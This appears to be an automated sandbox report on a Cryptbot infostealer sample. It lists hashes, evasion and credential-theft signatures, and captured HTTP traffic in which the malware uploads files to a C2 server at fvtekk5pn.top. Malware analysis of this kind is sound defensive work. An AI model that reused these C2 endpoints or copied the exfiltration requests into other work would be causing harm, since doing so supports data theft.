Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562201
MD5: 2b0c7447e2568d3a7de91ecd14787204
SHA1: 658b8b86bd1f906cf2e30675f8fe7de8b350fb79
SHA256: 15132d20fdd894d09f23b8e7bdaf49736a0191a230a24141c63000d4b43ca72a
Tags: exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\service123.exe ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 39%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B315B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 7_2_00B315B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1E14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 7_2_6C1E14B0
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_c973b6c0-9
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 7_2_00B381E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C200860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C20A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C20A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C20A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C2BF960h 7_2_6C1FEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C204453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 7_2_6C2884A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C20C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C20A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C20A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C20A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C20E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C20E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 7_2_6C280730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C200740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 7_2_6C23A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C200260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C2BD014h] 7_2_6C2B4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C257D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 7_2_6C253840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 7_2_6C20D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 7_2_6C239B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 7_2_6C21BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 7_2_6C21BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 7_2_6C20D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 7_2_6C259600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 7_2_6C20D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C2BDFF4h 7_2_6C253690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 7_2_6C20D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 7_2_6C283140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C1FB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C20D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 7_2_6C277350
Source: chrome.exe Memory has grown: Private usage: 0MB later: 26MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49738 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49732 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49764 -> 34.116.198.130:80
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------pYYjhWy1oYCwrN4mefAuztData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 59 59 6a 68 57 79 31 6f 59 43 77 72 4e 34 6d 65 66 41 75 7a 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 69 73 65 79 65 67 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a de f9 a8 ef 91 39 f2 7b 9b 80 d0 a5 26 c9 1f 59 21 42 11 23 d4 a1 af f9 41 e1 16 62 90 d0 3c fc 00 f6 0b 61 bd 83 f1 25 47 b7 a5 39 34 87 ad 6c 45 0e 98 9e cd de 2b 60 a0 96 1b ed a0 76 23 1c 6c e3 8d ba 03 c1 b0 64 53 65 66 15 40 91 b0 11 5c 25 1e d2 20 9e b3 33 eb 1f 31 0f 51 e1 1a 8d ae 84 c3 88 30 46 31 d0 ce 61 ea dc 88 40 f4 cd ba af 5e 4a 38 b2 bd ea db 96 6f 70 81 f3 d9 3e 7f 4c a0 2e b8 b9 dd 5c 68 92 5e 79 4a a4 df a8 ae a9 7a ea 22 f4 a7 a8 3b a8 6a ba ab 28 2a 03 81 c5 45 bb 4d b3 c8 a0 5f 3a 6d 55 4c 47 cd ec 7c ed 0a d6 e7 31 c0 52 15 8a fc 64 f8 12 8d d7 09 e7 c2 c9 45 10 be 28 74 2d 7a cc 27 eb 88 01 db 9b a9 08 b4 7f 53 14 3f 18 b6 3a 18 a4 b3 bb 76 3b fa f2 24 3d 0b 2b 02 21 7d 42 3b 8f eb 1d f5 80 d1 6b c9 ff 7a 17 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 59 59 6a 68 57 79 31 6f 59 43 77 72 4e 34 6d 65 66 41 75 7a 74 2d 2d 0d 0a Data Ascii: --------------------------pYYjhWy1oYCwrN4mefAuztContent-Disposition: form-data; name="file"; filename="Viseyeg.bin"Content-Type: application/octet-stream9{&Y!B#Ab<a%G94lE+`v#ldSef@\% 31Q0F1a@^J8op>L.\h^yJz";j(*EM_:mULG|1RdE(t-z'S?:v;$=+!}B;kz--------------------------pYYjhWy1oYCwrN4mefAuzt--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 76358Content-Type: multipart/form-data; boundary=------------------------szmG4cU03ja3hQXTJmg4BsData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 73 7a 6d 47 34 63 55 30 33 6a 61 33 68 51 58 54 4a 6d 67 34 42 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 61 67 69 6a 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 7f a5 94 ea bb c7 9d 5d e6 f7 24 03 65 a7 b1 1d 29 52 5e 56 b0 ca 10 ed f9 a0 14 b6 17 16 a9 29 9c 16 8f 78 6a 65 9a fa 10 a0 18 6a fc ef b3 cb 8a ea 67 03 4e be dc d2 e1 5b 88 aa d0 91 47 fe 66 bf ba 5f e7 c5 da 62 d9 fb c8 a6 11 d1 6a 2b 0c 19 01 b8 bf fc 56 bb f9 dd 47 98 43 ea 64 11 90 51 ca 29 c1 65 70 0c d4 bb 5c 7b a4 f8 21 d2 e8 f6 cb 78 15 c4 23 71 8e 19 17 33 e4 29 27 7f 9f 6a 0a eb 9d b8 0c ec 3a 5a 14 13 8a df 09 6a 15 e1 3f b9 4c ce a3 ef bb 3d f9 31 8a 20 8f 6a 65 6d f5 fe c9 c2 34 29 65 b0 68 a0 a1 bd ad 2d 2b 04 2c 61 2d 82 b7 a6 95 a4 44 5d 40 e8 9d 17 64 f0 c3 a1 c6 6e d1 5f e7 e6 be d5 f9 d2 f0 71 3a 6a be de bd 6a 98 ce b2 92 0f 98 e9 fb a9 c5 59 b2 64 87 ef a4 15 a6 b5 49 c2 8a 8e 1a 25 fd 14 45 3a 35 ba fa 07 57 da 7e b6 c3 ec 8d 85 07 f1 44 28 e9 45 d0 2f d7 f0 d1 88 5b 55 a0 62 7d ac 77 21 3b f7 dd 18 f3 04 94 ae 64 1d 81 82 3b 83 8b 96 48 d0 fa 4d 0d c5 53 a5 13 4a 1b 9a e6 bf bd 22 83 12 b8 7b cc c3 e9 29 f2 d4 a2 7a c4 ba 02 5a 2a 59 60 bf 6a 0c e4 5b b2 28 2e 23 c7 89 f4 63 b5 08 a1 a7 e4 20 6c 0e 18 45 74 9d b8 04 9b f7 ca 33 6c 30 c6 52 7e 00 30 68 52 f1 3d 5d 17 88 d4 59 33 4a 97 e1 ec 44 91 5a 81 90 57 49 e0 84 f2 b2 eb b6 12 ca 28 fa d9 e3 0b 91 36 cd fc 74 3c ec 3e d1 15 1e 1c 13 6f dd e6 b2 36 d0 6b f1 0b 00 d0 cd ec 03 1a dd 13 56 5e 22 1c f7 8e 0d 78 e8 d5 e3 0d 16 11 70 30 13 bb cd b9 a4 39 1d 61 38 51 82 d8 01 6b 0f b7 30 23 83 86 59 35 19 cf ff 51 d9 f7 1f 86 03 dd 5d 13 8e 90 64 b1 fc c8 ac 80 a4 7e 8f 10 80 01 c2 f9 4e e0 3b a6 2b 45 37 d3 38 2b 09 74 af bc 51 16 45 a1 59 80 bd 3e c6 ac bc 52 54 37 29 97 1e f6 26 10 b0 23 67 a6 e5 e0 eb 1a d1 2a fc d9 4a 72 54 6e fa 11 cd e2 f9 bb cf 8b a0 f4 f1 a8 44 05 90 7a ad e9 74 95 ce e5 ea 72 3d 20 71 f4 75 d4 eb d5 33 e6 66 b0 a0 bd 62 af bc 53 28 eb ce f7 6d f0 cc 68 84 5b a7 de a2 74 15 ff 39 65 99 78 fb 64 aa e4 40 d9 31 21 92 00 e4 01 9b cd 47 b5 32 1d 8a c5 99 86 fe b7 a8 9a 59 24 50 bd bd 1a 1a 1b 1e c5 8a 3a f3 85 e4 cb cc ef 0f f6 f0 2a 10 43 c7 5e 90 2f fe f0 21 6a 17 48 33 cb a8 e6 65 99 74 41 b8 93 de 57 76 59 e8 81 fe 03 d8 79 59 41 b9 63 cf 14 d1 22 1a 77 0d 9e d2 b1 26 3f 19 27 33 e5 f4 f4 42 20 39 0a 44 47 55 de b3 c3 96 54 2f 25 fa 6e 94 4e 33 95 2f d7 4b f7 12 19 ea f9 16 e6 76 6c 66 da 93 41 7f 78 53 4f f2 b6 af 08 f8 28 bd a0 f6 72 dc 9e ad 88 aa cf a5 d3 58 64 ce ef c3 3a c2 f6 79 8e d5
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 30336Content-Type: multipart/form-data; boundary=------------------------LHHzmXo5pE7mAUW3vt0VsuData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4c 48 48 7a 6d 58 6f 35 70 45 37 6d 41 55 57 33 76 74 30 56 73 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 65 66 75 6a 6f 77 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 87 80 2f 8a 96 f0 e8 2a c9 36 a1 90 5c cc 24 81 27 5b aa ae 98 b5 81 49 43 8a 01 61 78 48 77 1b 9a af 1e 47 96 de e6 8b a8 f7 4d 46 5d 2d 93 68 dc b8 81 c6 56 69 e7 f1 f6 89 87 e6 49 66 55 1e f4 0e 36 e7 d9 9c 8b 6a 26 90 05 c8 5c 76 f6 88 11 ee ac 9b 08 85 64 4c 65 22 94 ea 7e 17 90 36 c0 9d 30 e6 a4 4a 09 7a dc 47 c0 97 a1 e6 dc b6 5d c9 24 fc e9 a6 70 93 dd f2 21 6d 56 b4 c0 8a f8 c5 01 97 23 6b af b8 d1 98 e7 b9 b4 de 85 06 90 37 bc 47 06 ce ae 95 1d a0 e1 66 5f 8a 8f e2 9d 1a cb cf 53 d5 a9 dd db 6c 7c de d5 49 3c 81 fe eb 60 5b d2 2f d0 2a 70 57 f1 26 b6 63 15 e0 eb 11 65 40 05 7e db 03 73 16 18 b3 a7 07 c5 fe c0 5b 1c 35 08 14 12 de c0 68 86 14 e9 58 aa 9c 77 05 13 e4 a6 7a a4 0c 78 e2 41 4d 37 e6 3f 35 12 a3 53 58 63 4c 8a 1c 85 6b 6e 7d 54 c8 9a 58 9e 17 cd 9d d1 5e 22 9d 67 2f aa f0 6d 07 92 e1 d7 b2 42 1f 7b 94 f7 35 30 fa cf 96 5c a2 c9 10 96 44 1a 40 40 9e 83 f7 5e 31 40 ca b6 e1 0c 64 36 69 2a 64 8e 54 a7 32 57 83 bc 28 d8 66 66 47 2f fa 68 d3 ef 52 02 30 48 1e 03 f6 d4 7e 2f b9 14 8f 39 5d db 03 c2 0b 5b c9 77 07 72 dd aa ee 07 eb b2 6c a8 4b 88 72 51 23 69 32 5b d9 f7 b2 23 06 8e fd b3 2f 23 f4 17 2a 53 13 b2 bd 1e bd e9 06 79 a6 bd ce 3d b1 b5 c7 a1 4c 98 58 bf 61 ef e6 5d ac aa 5f cd 7d 9c 8a 54 d6 51 c4 68 c9 2e 8a 8e a5 30 59 b9 e2 74 5f 19 fe 20 06 c2 01 2c 36 69 3f 4c fa f1 ec 25 b8 fa 3a ea cd 18 d9 ce b4 f6 86 f7 64 80 69 cb 5f 3d 3d a1 0c dc 2e c6 c0 33 78 2b ee f9 70 72 ad 01 98 e5 a8 b0 8f 9c 17 56 2e d3 b4 94 8d 31 bd 24 9f 48 06 6f 25 8d 8d 66 0c 2a e8 83 5f 20 d4 be 56 4a 4d 8d 81 1a 6b 57 d1 b4 fd b4 a8 2d 23 3c 7f 75 6d 9c 83 93 f4 fb 63 90 22 a0 cf 28 66 f1 36 8c 3f d3 f2 46 76 94 cc 81 9e c7 a8 ee 5c ad 7f b4 3a 42 a7 df a0 5e d1 6f 37 8f 2d a0 41 f7 ce a4 63 91 8f e5 9e d4 c6 df b6 e9 34 45 87 06 05 11 4b 67 2d 83 0f cb 14 63 e6 e4 93 19 29 89 8d 49 51 1c 86 e3 b5 29 fc 7f 40 f3 2e 78 5a d0 c0 9e 43 59 6c 65 92 84 b9 ae a3 d6 8b 2e db 0f 50 05 b5 ee f5 f8 d3 46 f4 51 73 ca 3f 24 5e 74 37 a3 b0 a3 84 2a 26 ec d8 ba 4a 86 3f 6f 10 ad f6 d1 69 40 b8 60 81 ab 62 dd 80 de 38 26 d0 64 dc a8 8f 89 fc 4b 0b a8 ae a1 9f bf ec c3 01 77 b3 82 94 25 e9 86 38 7c 72 77 66 6f 9d 12 96 6b 48 81 a3 d4 56 32 d4 be d1 b1 84 b7 c5 2c 4d 55 91 4a 0e 80 2d 55 00 91 1f 6e fb ea 2d 04 2d 7d 45 79 9c 89 90 ac 09 10 e6 84 69 84 34 88 36 a0 fe f3 c6 ea 72 a4 88 88 74 e3 3f b3
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2404071818.00002854000FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000003.2383596431.000028540040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2383051026.0000285400EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2383098644.0000285400E64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000003.00000003.2383596431.000028540040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2383051026.0000285400EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2383098644.0000285400E64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) 